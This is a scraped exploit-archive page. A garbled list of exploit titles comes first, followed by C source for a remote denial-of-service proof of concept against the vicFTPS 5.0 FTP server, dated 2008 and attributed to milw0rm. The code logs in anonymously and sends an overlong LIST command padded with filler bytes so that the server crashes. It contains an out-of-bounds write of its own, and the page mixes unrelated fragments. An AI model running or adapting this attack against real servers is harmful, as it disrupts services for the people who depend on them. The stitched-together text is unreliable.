
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
88 lines
3 KiB
C
Executable file
88 lines
3 KiB
C
Executable file
#include <cstdio>
|
|
#include <winsock2.h>
|
|
#include <memory.h>
|
|
#define __z00ro(a) memset(a,0,sizeof(a));
|
|
|
|
//greetings : SiD.psycho
|
|
//Smallest greetings : Gorion - lofamy cIem We want be like y0U :***
|
|
|
|
unsigned int setport(const char* port){
|
|
if((atoi(port)==0) || (atoi(port)<0)){
|
|
return 21;
|
|
}
|
|
return atoi(port);
|
|
}
|
|
|
|
int main(int argc,char **argv){
|
|
|
|
printf("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"
|
|
"+=========== vicFTPS v 5.0 REMOTE dos POC ;[ ===========+\n"
|
|
"+=========== Alfons Luja sp Z.0.0 ===========+\n"
|
|
"+=========== I want clear b00f not a d0s !!! ===========+\n"
|
|
"+=========== Propably 0 dAy ===========+\n"
|
|
"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n");
|
|
if(argc<3){
|
|
printf("\nuse poc.exe IP PORT\n");
|
|
return 0;
|
|
}
|
|
int socks;
|
|
hostent *host;
|
|
WSADATA WSA;
|
|
SOCKADDR_IN aip;
|
|
char recvs[666]={0}; //ave
|
|
char test[66]={0}; // 4 nothing
|
|
const char *login = "USER Anonymous\r\n";
|
|
const char *pass = "PASS echo@gov.tr\r\n";
|
|
strcpy(test,"LIST /\\/iWana_be_like_Gorion\\");
|
|
memset(test+strlen("LIST /\\/iWana_be_like_Gorion\\"),0x42,sizeof(test));
|
|
test[sizeof(test)-2]='\r';
|
|
test[sizeof(test)-1]='\n';
|
|
test[sizeof(test)]='\0';
|
|
printf("\nTarget:%s\nPort:%u\n",argv[1],setport(argv[2]));
|
|
if((WSAStartup(MAKEWORD(4, 2), &WSA))==0){
|
|
if((socks = socket(AF_INET,SOCK_STREAM,0)) != -1){
|
|
aip.sin_family = AF_INET;
|
|
aip.sin_addr.s_addr = inet_addr(argv[1]);
|
|
aip.sin_port = htons(setport(argv[2]));
|
|
memset(&(aip.sin_zero),'0',8);
|
|
if(connect(socks,(struct sockaddr*)&aip,sizeof(struct sockaddr)) == 0){
|
|
recv(socks,recvs,sizeof(recvs)-1,0);
|
|
__z00ro(recvs);
|
|
send(socks,login,strlen(login),0);
|
|
recv(socks,recvs,sizeof(recvs)-1,0);
|
|
__z00ro(recvs);
|
|
send(socks,pass,strlen(pass),0);
|
|
recv(socks,recvs,sizeof(recvs)-1,0);
|
|
printf("%s",recvs);
|
|
if(!strncmp(recvs,"230 fake user logged in.",3)){
|
|
printf("Send greeting!!\n");
|
|
__z00ro(recvs);
|
|
send(socks,test,sizeof(test),0);
|
|
recv(socks,recvs,sizeof(recvs)-1,0);
|
|
Sleep(200);
|
|
printf("Server is charmed and died happy!!\n");
|
|
}
|
|
else{
|
|
printf("Target dont love us . You must have account :[\r\n");
|
|
closesocket(socks);
|
|
WSACleanup();
|
|
return 0;
|
|
}
|
|
}
|
|
else {
|
|
printf("(__eRROR):[Connection error](!!!!)\n"
|
|
"It can be bad port number or IP addresss!\n");
|
|
closesocket(socks);
|
|
WSACleanup();
|
|
return 0;
|
|
}
|
|
}
|
|
WSACleanup();
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
|
|
//~~@KND http://pl.youtube.com/watch?v=KvFAx3ArmlE ~@~
|
|
|
|
// milw0rm.com [2008-10-24]
|